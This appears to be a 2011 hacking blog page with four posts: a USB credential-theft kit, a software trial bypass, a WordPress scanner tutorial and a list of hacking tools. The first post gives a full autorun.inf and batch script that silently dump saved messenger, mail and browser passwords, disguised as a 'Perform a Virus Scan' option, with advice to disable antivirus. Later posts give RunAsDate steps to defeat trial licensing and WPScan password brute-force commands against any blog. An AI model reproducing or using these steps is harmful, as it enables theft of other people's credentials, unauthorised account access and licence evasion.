Friday, July 29, 2011

How to sniff Passwords using USB Drive

Anyone with a USB drive and a minute of physical access can copy the passwords a Windows machine has saved for its logged-in user.
Don't believe it?
Read on..
As we all know, Windows and the programs on it keep many of the passwords that are used daily: instant messenger passwords (MSN, Yahoo, AOL, Windows Messenger and so on), Outlook Express, SMTP, POP and FTP account passwords, and the auto-complete passwords of browsers such as IE and Firefox. Many tools exist for recovering these passwords from the places they are stored; the five used below are NirSoft's, and all of them accept a /stext switch that writes their results to a plain text file. With these tools and a USB pen drive you can build your own password-dumping kit. (The post calls it a "rootkit" and speaks of "sniffing", but nothing here hides itself, touches the kernel, or listens on the network: the tools simply read credentials that are already stored on disk for the current user.) We need the following tools:
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of web-based email accounts (Hotmail, Yahoo!, Gmail) if you use the associated desktop programs for these accounts.
IE PassView: A small utility that reveals the passwords stored by the Internet Explorer browser. It supports the new Internet Explorer 7.0 as well as older versions of Internet Explorer, v4.0 to v6.0.
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of password-protected sites, MSN Explorer passwords, and more.
PasswordFox: A small password recovery tool that lets you view the user names and passwords stored by the Mozilla Firefox web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select any other Firefox profile. For each password entry the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step-by-step procedure to create the password recovery kit.
NOTE: Antivirus products flag these tools as hack tools or potentially unwanted programs, so you must temporarily disable your antivirus on the machine where you build the drive. Expect the same detection on any target that runs antivirus.
1. Download all five tools, extract them and copy only the executables (.exe files) onto your USB pen drive.
i.e. copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into the root of your USB drive.
2. Create a new text file in Notepad with the following contents. The [autorun] section header and the open= line are what actually tell Windows which file to launch; ACTION= only sets the label shown in the AutoPlay dialog.
[autorun]
open=launch.bat
ACTION=Perform a Virus Scan
Save the file and rename it from New Text Document.txt to autorun.inf, then copy autorun.inf to the root of your USB pen drive.
3. Create another text file in Notepad with the following contents. Each line starts one tool with NirSoft's /stext switch, which writes the recovered entries to the named text file instead of opening a window; relative names work because the launcher runs with the drive root as its working directory.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Save the file and rename it from New Text Document.txt to launch.bat, then copy launch.bat to the USB drive as well.
Now your kit is ready. You can use this pen drive on any computer to collect the stored passwords. Just follow these steps:
1. Insert the pen drive. If the computer honours autorun.inf on removable drives, the AutoPlay window pops up.
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. All the password recovery tools now run silently in the background (this takes only a few seconds) and write what they find to the .TXT files on the drive.
4. Remove the pen drive and open the .TXT files to read the stored passwords.
NOTE: This procedure only recovers passwords that are already stored on the computer (if any), and only those belonging to the user who is logged in when the drive is inserted; Firefox passwords protected by a master password stay encrypted unless you have that password.
NOTE: Step 1 depends on AutoRun, which modern Windows no longer offers for USB drives. Windows 7 does not honour autorun.inf on non-optical removable media, and Microsoft's February 2011 update (KB971029) brought Windows XP and Vista into line, so on a patched machine no "Perform a Virus Scan" entry appears and you have to open the drive and run launch.bat by hand. Antivirus on the target will also usually quarantine the NirSoft executables as soon as the drive is inserted.
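As an added example (not code from the original post), here is a Python script that decodes the NoDriveTypeAutoRun policy, the setting that controls whether autorun.inf on a USB stick may launch anything at all. The bit layout (1 << DRIVE_* for each GetDriveType constant, 0x80 for unrecognised types), the 0x91 default and the registry path are Microsoft's documented values; the function names and the fallback to 0x91 when nothing is readable are this example's own choices. It touches the registry only on Windows, so elsewhere it just decodes the assumed default.

```python
"""Decode Windows' NoDriveTypeAutoRun policy to see whether autorun.inf on a USB
stick can still launch anything. Added example, not code from the original post.

NoDriveTypeAutoRun is a bitmask of drive types on which AutoRun is DISABLED; each
bit is 1 << DRIVE_* (the GetDriveType constants), plus 0x80 for unrecognised types.
0x91 is the long-standing Windows default (AutoRun off only for unknown, network
and unrecognised drives) and 0xFF disables it on every drive type.
"""
import sys

DRIVE_TYPE_BITS = {
    0x01: "DRIVE_UNKNOWN",
    0x02: "DRIVE_NO_ROOT_DIR",
    0x04: "DRIVE_REMOVABLE",   # USB sticks, floppies
    0x08: "DRIVE_FIXED",
    0x10: "DRIVE_REMOTE",
    0x20: "DRIVE_CDROM",
    0x40: "DRIVE_RAMDISK",
    0x80: "UNRECOGNISED",
}

# Policy location (same relative path under HKLM and HKCU).
POLICY_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"
ASSUMED_DEFAULT = 0x91   # assumption: classic default when the value is unset


def decode_autorun_mask(mask):
    """Map a NoDriveTypeAutoRun value to {drive type name: AutoRun disabled?}."""
    return {name: bool(mask & bit) for bit, name in DRIVE_TYPE_BITS.items()}


def usb_autorun_blocked(mask):
    """True if the policy alone stops autorun.inf on removable (USB) drives."""
    return bool(mask & 0x04)


def read_policy_from_registry():
    """Read the value on a Windows host (HKLM policy first, then HKCU).

    Returns None when the value is not set or when not running on Windows.
    Remember that Windows 7 and the KB971029 update ignore autorun.inf on
    removable media regardless of this value; the mask only adds a second lock.
    """
    if sys.platform != "win32":
        return None
    import winreg  # only importable on Windows
    for hive in (winreg.HKEY_LOCAL_MACHINE, winreg.HKEY_CURRENT_USER):
        try:
            with winreg.OpenKey(hive, POLICY_KEY) as key:
                value, _ = winreg.QueryValueEx(key, "NoDriveTypeAutoRun")
                return int(value)
        except OSError:
            continue
    return None


def effective_mask():
    """Registry value if readable, otherwise the assumed default."""
    value = read_policy_from_registry()
    return ASSUMED_DEFAULT if value is None else value


if __name__ == "__main__":
    value = effective_mask()
    print(f"NoDriveTypeAutoRun = 0x{value:02X}")
    for drive_type, disabled in decode_autorun_mask(value).items():
        print(f"  {drive_type:16s} AutoRun {'disabled' if disabled else 'ENABLED'}")
    print("USB autorun.inf blocked by policy:", usb_autorun_blocked(value))
```

To close the policy lock yourself, set NoDriveTypeAutoRun to 0xFF (decimal 255) as a REG_DWORD under the HKLM key above; the decoder then reports every drive type as disabled.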

How to Hack Software and run Trial Program Forever

Many trial programs can be kept running after their trial period is over.
Just read on..
Most of us are familiar with programs that run only for a specified period in trial mode. Once the trial period has expired they stop working and demand a purchase. There is a way to keep such programs working beyond the trial period. Isn't this interesting?
Before I explain how to keep a program in trial mode, we have to understand how these programs keep track of the trial. I'll explain briefly.
When such a program is installed for the first time, it makes an entry in the Windows Registry with details such as the installation date and time and the install path. Every time you run it afterwards, it compares the current system date and time with the recorded installation date and time, and from that works out whether the trial period has expired.
Given that, simply winding the whole system clock back is a crude fix: it disturbs everything else on the machine and is easy for the program to notice. A small tool called RunAsDate does the same thing far more selectively.
RunAsDate is a small utility that runs a program under a date and time that you specify. It does not change the system clock; it injects the chosen date/time into the one application only.
RunAsDate hooks the Win32 API calls in kernel32.dll that return the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime) and replaces their results with the date/time that you specify. It works with Windows 2000, XP, 2003 and Vista (I haven't tried it with Windows 7). A program that takes the time from anywhere else, such as file timestamps, the network or a licence server, is not fooled by it.
Follow these tips carefully to keep a program running in its trial mode:
1. Note down the date and time when you install the program for the first time.
2. Once the trial period has expired, always start the program through RunAsDate.
3. After the trial period has expired, never run the program directly. Many programs also record the latest date they have seen; if you run one directly even once after expiry, it can store that later date and reject every earlier date from then on, and this trick will no longer work.
4. It is safer to inject a date just inside the end of the trial period rather than the expiry day itself.
For example, if the trial period expires on Apr 30 2011, always inject Apr 29 2011 in RunAsDate. I hope this helps! Please share your experience and opinions in the comments.
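Why step 3 matters is easiest to see in code. The following Python model (an added example, not RunAsDate's code nor any vendor's licensing code) stands in for the registry entry with an in-memory record and compares the naive check the post describes with a version that also remembers the latest time it has ever seen. The injected date is modelled simply as the now argument, the 30-day trial length is an assumption, and all dates are constructed.

```python
"""Toy model of a trial-period check, naive versus rollback-aware.
Added example; the registry entry is replaced by an in-memory record and the
date RunAsDate would inject is passed in as `now`. Dates are constructed."""
from datetime import datetime, timedelta

TRIAL_DAYS = 30   # assumption for the example


class TrialRecord:
    """Stand-in for the registry entry written at install time."""

    def __init__(self, installed_at):
        self.installed_at = installed_at
        self.last_seen = installed_at   # only the rollback-aware check uses this


def naive_check(record, now):
    """What the post describes: compare the current time with the install time."""
    return now - record.installed_at < timedelta(days=TRIAL_DAYS)


def rollback_aware_check(record, now):
    """Same comparison, but also keep a high-water mark of the latest time seen.
    A clock that appears to run backwards (a manual change or an injected date)
    is refused, and an expired run still advances the mark. That is exactly why
    running the program directly once after expiry breaks the RunAsDate trick."""
    if now < record.last_seen:
        return False
    record.last_seen = now
    return now - record.installed_at < timedelta(days=TRIAL_DAYS)


def run_scenario(check, run_directly_after_expiry):
    """Install on Apr 1 2011, run on Apr 10 (inside the trial), optionally run
    on May 5 without RunAsDate (expired), then run twice with Apr 29 injected.
    Returns the list of allowed/denied results in that order."""
    record = TrialRecord(datetime(2011, 4, 1))
    results = [check(record, datetime(2011, 4, 10))]
    if run_directly_after_expiry:
        results.append(check(record, datetime(2011, 5, 5)))
    results.append(check(record, datetime(2011, 4, 29)))
    results.append(check(record, datetime(2011, 4, 29)))
    return results


if __name__ == "__main__":
    for name, check in (("naive", naive_check), ("rollback-aware", rollback_aware_check)):
        for direct in (False, True):
            print(f"{name:15s} direct run after expiry={direct!s:5s} -> {run_scenario(check, direct)}")
```

Against the naive check the injected date works whether or not the program was run directly after expiry; against the rollback-aware check it works only while the program has never seen a date later than the injected one.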

WPScan – WordPress Security Scanner

What is WPScan?

WPScan is a fast WordPress vulnerability scanner written in Ruby, sponsored by RandomStorm and hosted on Google Code. It gives you an easy way to assess WordPress blogs using black-box techniques.
You can find out the following about any WordPress blog using this Ruby application:
  • List of installed plugins
  • Name of the theme
  • Weak passwords for a specific user, by brute force against a wordlist
  • Valid usernames (enumeration)
  • Directory listings
  • Version details
  • Possible vulnerabilities
How to Install WPScan?
Before you install WPScan, you have to install a number of dependencies that this small Ruby application needs. By the way, I am using BackTrack 5 Linux.
Dependencies :
apt-get install libcurl4-gnutls-dev
gem install --user-install mime-types
gem install --user-install xml-simple
gem install --user-install typhoeus
WPScan Installation (after obtaining the WPScan source tree from its Google Code project and placing it under /pentest/web/wpscan):
cd /pentest/web/
cd wpscan

How to use WPScan?
It is almost done. One more thing we need is a wordlist for the password brute force; the darkc0de.lst wordlist ships compressed with BackTrack and has to be unpacked first:
gunzip darkc0de.lst.gz
Example usage of the application (replace <url> with the target blog's address):
Do 'non-intrusive' checks...
ruby ./wpscan.rb --url <url>
Do a wordlist password brute force against the enumerated users using 50 threads...
ruby ./wpscan.rb --url <url> --wordlist darkc0de.lst --threads 50
Do a wordlist password brute force against the 'admin' username only...
ruby ./wpscan.rb --url <url> --wordlist darkc0de.lst --username admin
Generate a new 'most popular' plugin list, up to 150 pages...
ruby ./wpscan.rb --generate_plugin_list 150
Enumerate installed plugins...
ruby ./wpscan.rb --url <url> --enumerate p
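To show what the 'non-intrusive' checks are doing under the hood, here is an added Python illustration (not WPScan's code) of passive WordPress fingerprinting from a single page fetch: the version from the generator meta tag, plugin slugs and their ?ver= versions from /wp-content/plugins/ asset URLs, and the theme from /wp-content/themes/. The HTML below is constructed, blog.example is a placeholder host, and the page body is passed in as a string so the code runs offline; in practice you would feed it the body returned by an HTTP client.

```python
"""Passive WordPress fingerprinting of the kind WPScan's non-intrusive checks do.
Added example, not WPScan's code. SAMPLE_HTML is constructed for the example."""
import re

SAMPLE_HTML = """<!DOCTYPE html><html><head>
<meta name="generator" content="WordPress 3.2.1" />
<link rel="stylesheet" href="http://blog.example/wp-content/themes/twentyeleven/style.css?ver=3.2.1" />
<link rel="stylesheet" href="http://blog.example/wp-content/plugins/contact-form-7/styles.css?ver=3.0" />
<script src="http://blog.example/wp-content/plugins/contact-form-7/scripts.js?ver=3.0"></script>
<script src="/wp-content/plugins/akismet/akismet.js?ver=2.5.3"></script>
<script src="/wp-includes/js/jquery/jquery.js?ver=1.6.1"></script>
</head><body>...</body></html>"""

# <meta name="generator" content="WordPress 3.2.1" />; the version part is optional
# because many hardened sites strip it while leaving the tag in place.
GENERATOR_RE = re.compile(r'<meta\s+name="generator"\s+content="WordPress\s*([\d.]+)?"', re.I)
ASSET_RE = re.compile(r"/wp-content/(plugins|themes)/([A-Za-z0-9_.-]+)/", re.I)
VERSION_PARAM_RE = re.compile(r"[?&]ver=([\d.]+)")
URL_ATTR_RE = re.compile(r'(?:src|href)="([^"]+)"', re.I)


def is_wordpress(html):
    """Cheap presence test: generator tag or any wp-content/wp-includes reference."""
    return bool(GENERATOR_RE.search(html) or re.search(r"/wp-(content|includes)/", html, re.I))


def wordpress_version(html):
    """Core version from the generator tag, or None when the tag is missing or stripped."""
    m = GENERATOR_RE.search(html)
    return m.group(1) if m and m.group(1) else None


def enumerate_components(html):
    """Return {'plugins': {slug: version-or-None}, 'themes': [slug, ...]}.

    Plugin versions come from the ?ver= parameter WordPress appends when a plugin
    registers its assets (first value seen wins). Theme assets usually carry the
    core version in ?ver=, so for themes only the slug is reported."""
    plugins, themes = {}, set()
    for m in URL_ATTR_RE.finditer(html):
        url = m.group(1)
        a = ASSET_RE.search(url)
        if not a:
            continue
        kind, slug = a.group(1).lower(), a.group(2)
        if kind == "themes":
            themes.add(slug)
            continue
        v = VERSION_PARAM_RE.search(url)
        plugins.setdefault(slug, v.group(1) if v else None)
    return {"plugins": plugins, "themes": sorted(themes)}


if __name__ == "__main__":
    print("WordPress:", is_wordpress(SAMPLE_HTML))
    print("Version:", wordpress_version(SAMPLE_HTML))
    print("Components:", enumerate_components(SAMPLE_HTML))
```

A site that removes the generator tag still leaks its core version through ?ver= on the wp-includes scripts and the theme stylesheet, which is why enumeration also looks at asset URLs; plugins that register no front-end assets are invisible to this passive pass and need the direct probing of plugin paths that WPScan's --enumerate p performs.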

7 Must Have Tools For Every Hacker


Hacking tools are developed by some very good coders to ease many complex tasks that would otherwise have to be done manually, taking a painstaking amount of time and effort. All the tools listed here are free of charge, have been tried hands-on and are being actively developed by the community; where one is not, an alternative is given. To sum up, these are the 7 must-have tools for every hacker out there.

1. Nmap 
I think everyone has heard of this one; it recently had its version 5 release.
Nmap (Network Mapper) is a free, open source utility for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Many system and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It can be used to discover computers and services on a network, thus creating a "map" of it. Nmap runs on most types of computers, and both console and graphical versions are available. It suits beginners (a plain connect scan, -sT) and pros alike (--packet-trace to see every probe and reply). A very versatile tool, once you fully understand the results.

Download Nmap

2. Nessus Remote Security Scanner 
Recently went closed source, but is still essentially free. Works with a client-server framework. Nessus is the world's most popular vulnerability scanner, used in over 75,000 organizations worldwide. Many of the world's largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

Download Nessus

3. Wireshark 
If you have been reading my site, you might have seen it in a couple of articles. Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers. It works great on both Linux and Windows (with a GUI), is easy to use and can reconstruct TCP/IP streams.

Download Wireshark

4. Cain and Abel 
The Swiss army knife of hacking tools. Cain & Abel is a password recovery tool for Microsoft operating systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Download Cain and Abel

5. Kismet 
Kismet is an 802.11 layer-2 wireless network detector, sniffer, and intrusion detection system. Kismet works with any wireless card that supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic. A good wireless tool, as long as your card supports rfmon.

Download Kismet

6. NetStumbler
Yes, a decent wireless tool for Windows! Sadly not as powerful as its Linux counterparts, but it is easy to use and has a nice interface, good for the basics of war-driving. NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
  1. Verify that your network is set up the way you intended.
  2. Find locations with poor coverage in your WLAN.
  3. Detect other networks that may be causing interference on your network.
  4. Detect unauthorized rogue access points in your workplace.
  5. Help aim directional antennas for long-haul WLAN links.
  6. Use it recreationally for WarDriving.

Download Netstumbler

7. SuperScan
A powerful TCP port scanner, pinger and resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool SuperScan. If you need an alternative to Nmap on Windows with a decent interface, I suggest you check this out; it is pretty nice.
Alternatively, you can try Angry IP Scanner, which is a pretty good replacement for it.

Download SuperScan